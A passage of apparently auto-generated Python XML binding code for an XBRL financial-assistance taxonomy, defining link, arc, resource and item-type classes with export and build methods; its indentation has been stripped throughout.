name1 = name[len(xsinamespace2):]
name2 = '%s:%s' % (xsinamespaceprefix, name1, )
if name2 not in already_processed:
already_processed.add(name2)
outfile.write(' %s=%s' % (name2, quote_attrib(value), ))
else:
mo = re_.match(Namespace_extract_pat_, name)
if mo is not None:
namespace, name = mo.group(1, 2)
if name not in already_processed:
already_processed.add(name)
if namespace == 'http://www.w3.org/XML/1998/namespace':
outfile.write(' %s=%s' % (
name, quote_attrib(value), ))
else:
unique_counter += 1
outfile.write(' xmlns:%d="%s"' % (
unique_counter, namespace, ))
outfile.write(' %d:%s=%s' % (
unique_counter, name, quote_attrib(value), ))
else:
if name not in already_processed:
already_processed.add(name)
outfile.write(' %s=%s' % (
name, quote_attrib(value), ))
if self.use is not None and 'use' not in already_processed:
already_processed.add('use')
outfile.write(' use=%s' % (quote_attrib(self.use), ))
if self.from_ is not None and 'from_' not in already_processed:
already_processed.add('from_')
outfile.write(' from=%s' % (quote_attrib(self.from_), ))
if self.title_attr is not None and 'title_attr' not in already_processed:
already_processed.add('title_attr')
outfile.write(' title=%s' % (self.gds_format_string(quote_attrib(self.title_attr).encode(ExternalEncoding), input_name='title_attr'), ))
if self.show is not None and 'show' not in already_processed:
already_processed.add('show')
outfile.write(' show=%s' % (self.gds_format_string(quote_attrib(self.show).encode(ExternalEncoding), input_name='show'), ))
if self.arcrole is not None and 'arcrole' not in already_processed:
already_processed.add('arcrole')
outfile.write(' arcrole=%s' % (self.gds_format_string(quote_attrib(self.arcrole).encode(ExternalEncoding), input_name='arcrole'), ))
if self.actuate is not None and 'actuate' not in already_processed:
already_processed.add('actuate')
outfile.write(' actuate=%s' % (self.gds_format_string(quote_attrib(self.actuate).encode(ExternalEncoding), input_name='actuate'), ))
if self.priority is not None and 'priority' not in already_processed:
already_processed.add('priority')
outfile.write(' priority=%s' % (quote_attrib(self.priority), ))
if self.to is not None and 'to' not in already_processed:
already_processed.add('to')
outfile.write(' to=%s' % (quote_attrib(self.to), ))
if self.type_ is not None and 'type_' not in already_processed:
already_processed.add('type_')
outfile.write(' type=%s' % (self.gds_format_string(quote_attrib(self.type_).encode(ExternalEncoding), input_name='type'), ))
if self.order is not None and 'order' not in already_processed:
already_processed.add('order')
outfile.write(' order=%s' % (quote_attrib(self.order), ))
if self.extensiontype_ is not None and 'xsi:type' not in already_processed:
already_processed.add('xsi:type')
outfile.write(' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"')
outfile.write(' xsi:type="%s"' % self.extensiontype_)
def exportChildren(self, outfile, level, namespace_='finassist:', name_='arcType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for title_ in self.title:
title_.export(outfile, level, namespace_, name_='title', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('use', node)
if value is not None and 'use' not in already_processed:
already_processed.add('use')
self.use = value
value = find_attr_value_('from', node)
if value is not None and 'from' not in already_processed:
already_processed.add('from')
self.from_ = value
value = find_attr_value_('title', node)
if value is not None and 'title_attr' not in already_processed:
already_processed.add('title_attr')
self.title_attr = value
value = find_attr_value_('show', node)
if value is not None and 'show' not in already_processed:
already_processed.add('show')
self.show = value
value = find_attr_value_('arcrole', node)
if value is not None and 'arcrole' not in already_processed:
already_processed.add('arcrole')
self.arcrole = value
value = find_attr_value_('actuate', node)
if value is not None and 'actuate' not in already_processed:
already_processed.add('actuate')
self.actuate = value
value = find_attr_value_('priority', node)
if value is not None and 'priority' not in already_processed:
already_processed.add('priority')
self.priority = value
value = find_attr_value_('to', node)
if value is not None and 'to' not in already_processed:
already_processed.add('to')
self.to = value
value = find_attr_value_('type', node)
if value is not None and 'type' not in already_processed:
already_processed.add('type')
self.type_ = value
value = find_attr_value_('order', node)
if value is not None and 'order' not in already_processed:
already_processed.add('order')
self.order = value
self.anyAttributes_ = {}
for name, value in attrs.items():
if name not in already_processed:
self.anyAttributes_[name] = value
value = find_attr_value_('xsi:type', node)
if value is not None and 'xsi:type' not in already_processed:
already_processed.add('xsi:type')
self.extensiontype_ = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'title':
type_name_ = child_.attrib.get(
'{http://www.w3.org/2001/XMLSchema-instance}type')
if type_name_ is None:
type_name_ = child_.attrib.get('type')
if type_name_ is not None:
type_names_ = type_name_.split(':')
if len(type_names_) == 1:
type_name_ = type_names_[0]
else:
type_name_ = type_names_[1]
class_ = globals()[type_name_]
obj_ = class_.factory()
obj_.build(child_)
else:
raise NotImplementedError(
'Class not implemented for <title> element')
self.title.append(obj_)
obj_.original_tagname_ = 'title'
# end class arcType
class resourceType(GeneratedsSuper):
"""Generic type for the resource type element"""
subclass = None
superclass = None
def __init__(self, role=None, title=None, type_=None, id=None, label=None, valueOf_=None, mixedclass_=None, content_=None, extensiontype_=None):
self.original_tagname_ = None
self.role = _cast(None, role)
self.title = _cast(None, title)
self.type_ = _cast(None, type_)
self.id = _cast(None, id)
self.label = _cast(None, label)
self.valueOf_ = valueOf_
self.extensiontype_ = extensiontype_
if mixedclass_ is None:
self.mixedclass_ = MixedContainer
else:
self.mixedclass_ = mixedclass_
if content_ is None:
self.content_ = []
else:
self.content_ = content_
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if resourceType.subclass:
return resourceType.subclass(*args_, **kwargs_)
else:
return resourceType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_role(self): return self.role
def set_role(self, role): self.role = role
def get_title(self): return self.title
def set_title(self, title): self.title = title
def get_type(self): return self.type_
def set_type(self, type_): self.type_ = type_
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_label(self): return self.label
def set_label(self, label): self.label = label
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def get_extensiontype_(self): return self.extensiontype_
def set_extensiontype_(self, extensiontype_): self.extensiontype_ = extensiontype_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='resourceType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='resourceType')
outfile.write('>')
self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='resourceType'):
if self.role is not None and 'role' not in already_processed:
already_processed.add('role')
outfile.write(' role=%s' % (self.gds_format_string(quote_attrib(self.role).encode(ExternalEncoding), input_name='role'), ))
if self.title is not None and 'title' not in already_processed:
already_processed.add('title')
outfile.write(' title=%s' % (quote_attrib(self.title), ))
if self.type_ is not None and 'type_' not in already_processed:
already_processed.add('type_')
outfile.write(' type=%s' % (self.gds_format_string(quote_attrib(self.type_).encode(ExternalEncoding), input_name='type'), ))
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.label is not None and 'label' not in already_processed:
already_processed.add('label')
outfile.write(' label=%s' % (quote_attrib(self.label), ))
if self.extensiontype_ is not None and 'xsi:type' not in already_processed:
already_processed.add('xsi:type')
outfile.write(' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"')
outfile.write(' xsi:type="%s"' % self.extensiontype_)
def exportChildren(self, outfile, level, namespace_='finassist:', name_='resourceType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
if node.text is not None:
obj_ = self.mixedclass_(MixedContainer.CategoryText,
MixedContainer.TypeNone, '', node.text)
self.content_.append(obj_)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('role', node)
if value is not None and 'role' not in already_processed:
already_processed.add('role')
self.role = value
value = find_attr_value_('title', node)
if value is not None and 'title' not in already_processed:
already_processed.add('title')
self.title = value
value = find_attr_value_('type', node)
if value is not None and 'type' not in already_processed:
already_processed.add('type')
self.type_ = value
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('label', node)
if value is not None and 'label' not in already_processed:
already_processed.add('label')
self.label = value
value = find_attr_value_('xsi:type', node)
if value is not None and 'xsi:type' not in already_processed:
already_processed.add('xsi:type')
self.extensiontype_ = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if not fromsubclass_ and child_.tail is not None:
obj_ = self.mixedclass_(MixedContainer.CategoryText,
MixedContainer.TypeNone, '', child_.tail)
self.content_.append(obj_)
pass
# end class resourceType
class extendedType(GeneratedsSuper):
"""Generic extended link type"""
subclass = None
superclass = None
def __init__(self, role=None, type_=None, id=None, title_attr=None, title=None, documentation=None, locator=None, arc=None, resource=None):
self.original_tagname_ = None
self.role = _cast(None, role)
self.type_ = _cast(None, type_)
self.id = _cast(None, id)
self.title_attr = _cast(None, title_attr)
if title is None:
self.title = []
else:
self.title = title
if documentation is None:
self.documentation = []
else:
self.documentation = documentation
if locator is None:
self.locator = []
else:
self.locator = locator
if arc is None:
self.arc = []
else:
self.arc = arc
if resource is None:
self.resource = []
else:
self.resource = resource
self.anyAttributes_ = {}
def factory(*args_, **kwargs_):
if extendedType.subclass:
return extendedType.subclass(*args_, **kwargs_)
else:
return extendedType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_title(self): return self.title
def set_title(self, title): self.title = title
def add_title(self, value): self.title.append(value)
def insert_title_at(self, index, value): self.title.insert(index, value)
def replace_title_at(self, index, value): self.title[index] = value
def get_documentation(self): return self.documentation
def set_documentation(self, documentation): self.documentation = documentation
def add_documentation(self, value): self.documentation.append(value)
def insert_documentation_at(self, index, value): self.documentation.insert(index, value)
def replace_documentation_at(self, index, value): self.documentation[index] = value
def get_locator(self): return self.locator
def set_locator(self, locator): self.locator = locator
def add_locator(self, value): self.locator.append(value)
def insert_locator_at(self, index, value): self.locator.insert(index, value)
def replace_locator_at(self, index, value): self.locator[index] = value
def get_arc(self): return self.arc
def set_arc(self, arc): self.arc = arc
def add_arc(self, value): self.arc.append(value)
def insert_arc_at(self, index, value): self.arc.insert(index, value)
def replace_arc_at(self, index, value): self.arc[index] = value
def get_resource(self): return self.resource
def set_resource(self, resource): self.resource = resource
def add_resource(self, value): self.resource.append(value)
def insert_resource_at(self, index, value): self.resource.insert(index, value)
def replace_resource_at(self, index, value): self.resource[index] = value
def get_role(self): return self.role
def set_role(self, role): self.role = role
def get_type(self): return self.type_
def set_type(self, type_): self.type_ = type_
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_title_attr(self): return self.title_attr
def set_title_attr(self, title_attr): self.title_attr = title_attr
def get_anyAttributes_(self): return self.anyAttributes_
def set_anyAttributes_(self, anyAttributes_): self.anyAttributes_ = anyAttributes_
def hasContent_(self):
if (
self.title or
self.documentation or
self.locator or
self.arc or
self.resource
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='extendedType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:xl="http://www.xbrl.org/2003/XLink" ', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='extendedType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='extendedType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='extendedType'):
unique_counter = 0
for name, value in self.anyAttributes_.items():
xsinamespaceprefix = 'xsi'
xsinamespace1 = 'http://www.w3.org/2001/XMLSchema-instance'
xsinamespace2 = '{%s}' % (xsinamespace1, )
if name.startswith(xsinamespace2):
name1 = name[len(xsinamespace2):]
name2 = '%s:%s' % (xsinamespaceprefix, name1, )
if name2 not in already_processed:
already_processed.add(name2)
outfile.write(' %s=%s' % (name2, quote_attrib(value), ))
else:
mo = re_.match(Namespace_extract_pat_, name)
if mo is not None:
namespace, name = mo.group(1, 2)
if name not in already_processed:
already_processed.add(name)
if namespace == 'http://www.w3.org/XML/1998/namespace':
outfile.write(' %s=%s' % (
name, quote_attrib(value), ))
else:
unique_counter += 1
outfile.write(' xmlns:%d="%s"' % (
unique_counter, namespace, ))
outfile.write(' %d:%s=%s' % (
unique_counter, name, quote_attrib(value), ))
else:
if name not in already_processed:
already_processed.add(name)
outfile.write(' %s=%s' % (
name, quote_attrib(value), ))
if self.role is not None and 'role' not in already_processed:
already_processed.add('role')
outfile.write(' role=%s' % (self.gds_format_string(quote_attrib(self.role).encode(ExternalEncoding), input_name='role'), ))
if self.type_ is not None and 'type_' not in already_processed:
already_processed.add('type_')
outfile.write(' type=%s' % (self.gds_format_string(quote_attrib(self.type_).encode(ExternalEncoding), input_name='type'), ))
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.title_attr is not None and 'title_attr' not in already_processed:
already_processed.add('title_attr')
outfile.write(' title=%s' % (self.gds_format_string(quote_attrib(self.title_attr).encode(ExternalEncoding), input_name='title_attr'), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='extendedType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for title_ in self.title:
title_.export(outfile, level, namespace_, name_='title', pretty_print=pretty_print)
for documentation_ in self.documentation:
documentation_.export(outfile, level, namespace_, name_='documentation', pretty_print=pretty_print)
for locator_ in self.locator:
locator_.export(outfile, level, namespace_, name_='locator', pretty_print=pretty_print)
for arc_ in self.arc:
arc_.export(outfile, level, namespace_, name_='arc', pretty_print=pretty_print)
for resource_ in self.resource:
resource_.export(outfile, level, namespace_, name_='resource', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('role', node)
if value is not None and 'role' not in already_processed:
already_processed.add('role')
self.role = value
value = find_attr_value_('type', node)
if value is not None and 'type' not in already_processed:
already_processed.add('type')
self.type_ = value
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('title', node)
if value is not None and 'title_attr' not in already_processed:
already_processed.add('title_attr')
self.title_attr = value
self.anyAttributes_ = {}
for name, value in attrs.items():
if name not in already_processed:
self.anyAttributes_[name] = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'title':
type_name_ = child_.attrib.get(
'{http://www.w3.org/2001/XMLSchema-instance}type')
if type_name_ is None:
type_name_ = child_.attrib.get('type')
if type_name_ is not None:
type_names_ = type_name_.split(':')
if len(type_names_) == 1:
type_name_ = type_names_[0]
else:
type_name_ = type_names_[1]
class_ = globals()[type_name_]
obj_ = class_.factory()
obj_.build(child_)
else:
raise NotImplementedError(
'Class not implemented for <title> element')
self.title.append(obj_)
obj_.original_tagname_ = 'title'
elif nodeName_ == 'documentation':
type_name_ = child_.attrib.get(
'{http://www.w3.org/2001/XMLSchema-instance}type')
if type_name_ is None:
type_name_ = child_.attrib.get('type')
if type_name_ is not None:
type_names_ = type_name_.split(':')
if len(type_names_) == 1:
type_name_ = type_names_[0]
else:
type_name_ = type_names_[1]
class_ = globals()[type_name_]
obj_ = class_.factory()
obj_.build(child_)
else:
raise NotImplementedError(
'Class not implemented for <documentation> element')
self.documentation.append(obj_)
obj_.original_tagname_ = 'documentation'
elif nodeName_ == 'documentation':
obj_ = documentationType.factory()
obj_.build(child_)
self.documentation.append(obj_)
obj_.original_tagname_ = 'documentation'
elif nodeName_ == 'locator':
type_name_ = child_.attrib.get(
'{http://www.w3.org/2001/XMLSchema-instance}type')
if type_name_ is None:
type_name_ = child_.attrib.get('type')
if type_name_ is not None:
type_names_ = type_name_.split(':')
if len(type_names_) == 1:
type_name_ = type_names_[0]
else:
type_name_ = type_names_[1]
class_ = globals()[type_name_]
obj_ = class_.factory()
obj_.build(child_)
else:
raise NotImplementedError(
'Class not implemented for <locator> element')
self.locator.append(obj_)
obj_.original_tagname_ = 'locator'
elif nodeName_ == 'loc':
obj_ = locatorType.factory()
obj_.build(child_)
self.locator.append(obj_)
obj_.original_tagname_ = 'loc'
elif nodeName_ == 'arc':
type_name_ = child_.attrib.get(
'{http://www.w3.org/2001/XMLSchema-instance}type')
if type_name_ is None:
type_name_ = child_.attrib.get('type')
if type_name_ is not None:
type_names_ = type_name_.split(':')
if len(type_names_) == 1:
type_name_ = type_names_[0]
else:
type_name_ = type_names_[1]
class_ = globals()[type_name_]
obj_ = class_.factory()
obj_.build(child_)
else:
raise NotImplementedError(
'Class not implemented for <arc> element')
self.arc.append(obj_)
obj_.original_tagname_ = 'arc'
elif nodeName_ == 'labelArc':
class_obj_ = self.get_class_obj_(child_, arcType)
obj_ = class_obj_.factory()
obj_.build(child_)
self.arc.append(obj_)
obj_.original_tagname_ = 'labelArc'
elif nodeName_ == 'referenceArc':
class_obj_ = self.get_class_obj_(child_, arcType)
obj_ = class_obj_.factory()
obj_.build(child_)
self.arc.append(obj_)
obj_.original_tagname_ = 'referenceArc'
elif nodeName_ == 'definitionArc':
class_obj_ = self.get_class_obj_(child_, arcType)
obj_ = class_obj_.factory()
obj_.build(child_)
self.arc.append(obj_)
obj_.original_tagname_ = 'definitionArc'
elif nodeName_ == 'presentationArc':
obj_ = presentationArc.factory()
obj_.build(child_)
self.arc.append(obj_)
obj_.original_tagname_ = 'presentationArc'
elif nodeName_ == 'calculationArc':
obj_ = calculationArc.factory()
obj_.build(child_)
self.arc.append(obj_)
obj_.original_tagname_ = 'calculationArc'
elif nodeName_ == 'footnoteArc':
class_obj_ = self.get_class_obj_(child_, arcType)
obj_ = class_obj_.factory()
obj_.build(child_)
self.arc.append(obj_)
obj_.original_tagname_ = 'footnoteArc'
elif nodeName_ == 'resource':
type_name_ = child_.attrib.get(
'{http://www.w3.org/2001/XMLSchema-instance}type')
if type_name_ is None:
type_name_ = child_.attrib.get('type')
if type_name_ is not None:
type_names_ = type_name_.split(':')
if len(type_names_) == 1:
type_name_ = type_names_[0]
else:
type_name_ = type_names_[1]
class_ = globals()[type_name_]
obj_ = class_.factory()
obj_.build(child_)
else:
raise NotImplementedError(
'Class not implemented for <resource> element')
self.resource.append(obj_)
obj_.original_tagname_ = 'resource'
elif nodeName_ == 'label':
obj_ = label.factory()
obj_.build(child_)
self.resource.append(obj_)
obj_.original_tagname_ = 'label'
elif nodeName_ == 'reference':
obj_ = reference.factory()
obj_.build(child_)
self.resource.append(obj_)
obj_.original_tagname_ = 'reference'
elif nodeName_ == 'footnote':
obj_ = footnote.factory()
obj_.build(child_)
self.resource.append(obj_)
obj_.original_tagname_ = 'footnote'
# end class extendedType
class simpleType(GeneratedsSuper):
"""Type for the simple links defined in XBRL"""
subclass = None
superclass = None
def __init__(self, show=None, title=None, actuate=None, href=None, role=None, arcrole=None, type_=None, extensiontype_=None):
self.original_tagname_ = None
self.show = _cast(None, show)
self.title = _cast(None, title)
self.actuate = _cast(None, actuate)
self.href = _cast(None, href)
self.role = _cast(None, role)
self.arcrole = _cast(None, arcrole)
self.type_ = _cast(None, type_)
self.anyAttributes_ = {}
self.extensiontype_ = extensiontype_
def factory(*args_, **kwargs_):
if simpleType.subclass:
return simpleType.subclass(*args_, **kwargs_)
else:
return simpleType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_show(self): return self.show
def set_show(self, show): self.show = show
def get_title(self): return self.title
def set_title(self, title): self.title = title
def get_actuate(self): return self.actuate
def set_actuate(self, actuate): self.actuate = actuate
def get_href(self): return self.href
def set_href(self, href): self.href = href
def get_role(self): return self.role
def set_role(self, role): self.role = role
def get_arcrole(self): return self.arcrole
def set_arcrole(self, arcrole): self.arcrole = arcrole
def get_type(self): return self.type_
def set_type(self, type_): self.type_ = type_
def get_anyAttributes_(self): return self.anyAttributes_
def set_anyAttributes_(self, anyAttributes_): self.anyAttributes_ = anyAttributes_
def get_extensiontype_(self): return self.extensiontype_
def set_extensiontype_(self, extensiontype_): self.extensiontype_ = extensiontype_
def hasContent_(self):
if (
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='simpleType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='simpleType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='simpleType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='simpleType'):
unique_counter = 0
for name, value in self.anyAttributes_.items():
xsinamespaceprefix = 'xsi'
xsinamespace1 = 'http://www.w3.org/2001/XMLSchema-instance'
xsinamespace2 = '{%s}' % (xsinamespace1, )
if name.startswith(xsinamespace2):
name1 = name[len(xsinamespace2):]
name2 = '%s:%s' % (xsinamespaceprefix, name1, )
if name2 not in already_processed:
already_processed.add(name2)
outfile.write(' %s=%s' % (name2, quote_attrib(value), ))
else:
mo = re_.match(Namespace_extract_pat_, name)
if mo is not None:
namespace, name = mo.group(1, 2)
if name not in already_processed:
already_processed.add(name)
if namespace == 'http://www.w3.org/XML/1998/namespace':
outfile.write(' %s=%s' % (
name, quote_attrib(value), ))
else:
unique_counter += 1
outfile.write(' xmlns:%d="%s"' % (
unique_counter, namespace, ))
outfile.write(' %d:%s=%s' % (
unique_counter, name, quote_attrib(value), ))
else:
if name not in already_processed:
already_processed.add(name)
outfile.write(' %s=%s' % (
name, quote_attrib(value), ))
if self.show is not None and 'show' not in already_processed:
already_processed.add('show')
outfile.write(' show=%s' % (self.gds_format_string(quote_attrib(self.show).encode(ExternalEncoding), input_name='show'), ))
if self.title is not None and 'title' not in already_processed:
already_processed.add('title')
outfile.write(' title=%s' % (quote_attrib(self.title), ))
if self.actuate is not None and 'actuate' not in already_processed:
already_processed.add('actuate')
outfile.write(' actuate=%s' % (self.gds_format_string(quote_attrib(self.actuate).encode(ExternalEncoding), input_name='actuate'), ))
if self.href is not None and 'href' not in already_processed:
already_processed.add('href')
outfile.write(' href=%s' % (quote_attrib(self.href), ))
if self.role is not None and 'role' not in already_processed:
already_processed.add('role')
outfile.write(' role=%s' % (self.gds_format_string(quote_attrib(self.role).encode(ExternalEncoding), input_name='role'), ))
if self.arcrole is not None and 'arcrole' not in already_processed:
already_processed.add('arcrole')
outfile.write(' arcrole=%s' % (self.gds_format_string(quote_attrib(self.arcrole).encode(ExternalEncoding), input_name='arcrole'), ))
if self.type_ is not None and 'type_' not in already_processed:
already_processed.add('type_')
outfile.write(' type=%s' % (self.gds_format_string(quote_attrib(self.type_).encode(ExternalEncoding), input_name='type'), ))
if self.extensiontype_ is not None and 'xsi:type' not in already_processed:
already_processed.add('xsi:type')
outfile.write(' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"')
outfile.write(' xsi:type="%s"' % self.extensiontype_)
def exportChildren(self, outfile, level, namespace_='finassist:', name_='simpleType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('show', node)
if value is not None and 'show' not in already_processed:
already_processed.add('show')
self.show = value
value = find_attr_value_('title', node)
if value is not None and 'title' not in already_processed:
already_processed.add('title')
self.title = value
value = find_attr_value_('actuate', node)
if value is not None and 'actuate' not in already_processed:
already_processed.add('actuate')
self.actuate = value
value = find_attr_value_('href', node)
if value is not None and 'href' not in already_processed:
already_processed.add('href')
self.href = value
value = find_attr_value_('role', node)
if value is not None and 'role' not in already_processed:
already_processed.add('role')
self.role = value
value = find_attr_value_('arcrole', node)
if value is not None and 'arcrole' not in already_processed:
already_processed.add('arcrole')
self.arcrole = value
value = find_attr_value_('type', node)
if value is not None and 'type' not in already_processed:
already_processed.add('type')
self.type_ = value
self.anyAttributes_ = {}
for name, value in attrs.items():
if name not in already_processed:
self.anyAttributes_[name] = value
value = find_attr_value_('xsi:type', node)
if value is not None and 'xsi:type' not in already_processed:
already_processed.add('xsi:type')
self.extensiontype_ = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class simpleType
class accountPurposeCodeItemType(tokenItemType):
subclass = None
superclass = tokenItemType
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
super(accountPurposeCodeItemType, self).__init__(id, contextRef, valueOf_, )
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if accountPurposeCodeItemType.subclass:
return accountPurposeCodeItemType.subclass(*args_, **kwargs_)
else:
return accountPurposeCodeItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_ or
super(accountPurposeCodeItemType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='accountPurposeCodeItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='accountPurposeCodeItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='accountPurposeCodeItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='accountPurposeCodeItemType'):
super(accountPurposeCodeItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='accountPurposeCodeItemType')
def exportChildren(self, outfile, level, namespace_='finassist:', name_='accountPurposeCodeItemType', fromsubclass_=False, pretty_print=True):
super(accountPurposeCodeItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
super(accountPurposeCodeItemType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class accountPurposeCodeItemType
class accountTypeItemType(tokenItemType):
subclass = None
superclass = tokenItemType
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
super(accountTypeItemType, self).__init__(id, contextRef, valueOf_, )
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if accountTypeItemType.subclass:
return accountTypeItemType.subclass(*args_, **kwargs_)
else:
return accountTypeItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_ or
super(accountTypeItemType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='accountTypeItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='accountTypeItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='accountTypeItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='accountTypeItemType'):
